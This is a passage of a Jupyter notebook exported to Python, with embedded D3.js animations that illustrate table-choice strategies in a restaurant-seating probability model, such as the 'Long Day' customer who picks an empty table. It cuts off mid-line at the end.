3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg8)\n }\n gambler2()\n</script>')
# In[12]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler3()" value="Run Animation">\n<div id="gambler3"></div>\n\n<script type="text/javascript"> \n function gambler3() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler3").select("svg").remove()\n var svg9 = d3.select("div#gambler3").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n fractions = ["1/3","1/3","1/3","0","0"]\n svg9.selectAll("line")\n .data(d3.range(3))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg9.selectAll("circle")\n // Collect\n .data(fractions)\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (+d!=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n \n svg9.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg9.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg9,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg9,1)\n }\n gambler3()\n</script>')
# In[13]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler4()" value="Run Animation">\n<div id="gambler4"></div>\n\n<script type="text/javascript"> \n function gambler4() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler4").select("svg").remove()\n var svg10 = d3.select("div#gambler4").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n fractions = ["1/4","1/4","1/4","1/4","0"]\n svg10.selectAll("line")\n .data(d3.range(4))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg10.selectAll("circle")\n // Collect\n .data(fractions)\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (+d!=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n \n svg10.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg10.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg10,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg10,1)\n var cx = ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg10,2)\n }\n gambler4()\n</script>')
# In[14]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler5()" value="Run Animation">\n<div id="gambler5"></div>\n\n<script type="text/javascript"> \n function gambler5() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler5").select("svg").remove()\n var svg11 = d3.select("div#gambler5").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n fractions = ["1/5","1/5","1/5","1/5","1/5"]\n svg11.selectAll("line")\n .data(d3.range(5))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg11.selectAll("circle")\n // Collect\n .data(fractions)\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (+d!=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n \n svg11.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg11.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg11,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg11,1)\n var cx = ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg11,2)\n var cx = ((radius) * Math.cos(x(3))) + (width/2)\n var cy = 
((radius) * Math.sin(x(3))) + (height-margin)\n addPeople(cx,cy,1,svg11,3)\n }\n gambler5()\n</script>')
# ### 3. The Long Day
#
# The Long Day scenario describes a situation where a customer (🤔) coming into the restaurant has had a reeeeeally long day. All they want is a table (⚪) to themselves to eat their food, pay, and go home. This is the opposite of the Social Butterfly: if there are people at a table (😃 & ⚪), they will find an empty table (⚪) instead.
#
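# A minimal sketch of The Long Day strategy (hypothetical code, not part of the original animations): the customer takes an empty table whenever one exists, and only shares when every table is occupied.
# In[ ]:
import numpy as np

rng = np.random.default_rng(0)

def long_day_choice(table_counts):
    # Prefer an empty table; fall back to a uniform pick only if all tables are occupied
    empty = [t for t, n in enumerate(table_counts) if n == 0]
    return rng.choice(empty) if empty else rng.choice(len(table_counts))

print(long_day_choice([2, 0, 0]))  # always one of the empty tables (1 or 2)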
# In[15]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long1()" value="Run Animation">\n<div id="long1"></div>\n\n<script type="text/javascript"> \n function long1() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#long1").select("svg").remove()\n var svg12 = d3.select("div#long1").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg12.selectAll("line")\n .data(d3.range(1))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg12.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/1","0","0","0","0"]\n svg12.selectAll("text")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg12.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n long1()\n</script>')
# In[16]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long2()" value="Run Animation">\n<div id="long2"></div>\n\n<script type="text/javascript"> \n function long2() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long2").select("svg").remove()\n var svg13 = d3.select("div#long2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg13.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg13.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","1/1","0","0","0"]\n svg13.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg13.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg13,0)\n\n }\n long2()\n</script>')
# In[17]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long3()" value="Run Animation">\n<div id="long3"></div>\n\n<script type="text/javascript"> \n function long3() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long3").select("svg").remove()\n var svg14 = d3.select("div#long3").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg14.selectAll("line")\n .data(d3.range(3))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg14.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=2)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","0","2/2","0","0"]\n svg14.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg14.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg14,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg14,1)\n\n }\n long3()\n</script>')
# In[18]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long4()" value="Run Animation">\n<div id="long4"></div>\n\n<script type="text/javascript"> \n function long4() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long4").select("svg").remove()\n var svg15 = d3.select("div#long4").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg15.selectAll("line")\n .data(d3.range(4))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg15.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=3)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","0","0","1","0"]\n svg15.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg15.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg15,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg15,1)\n var cx = ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg15,2)\n\n }\n long4()\n</script>')
# In[19]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long5()" value="Run Animation">\n<div id="long5"></div>\n\n<script type="text/javascript"> \n function long5() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long5").select("svg").remove()\n var svg16 = d3.select("div#long5").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg16.selectAll("line")\n .data(d3.range(5))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg16.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=4)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","0","0","0","1"]\n svg16.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg16.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg16,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg16,1)\n var cx 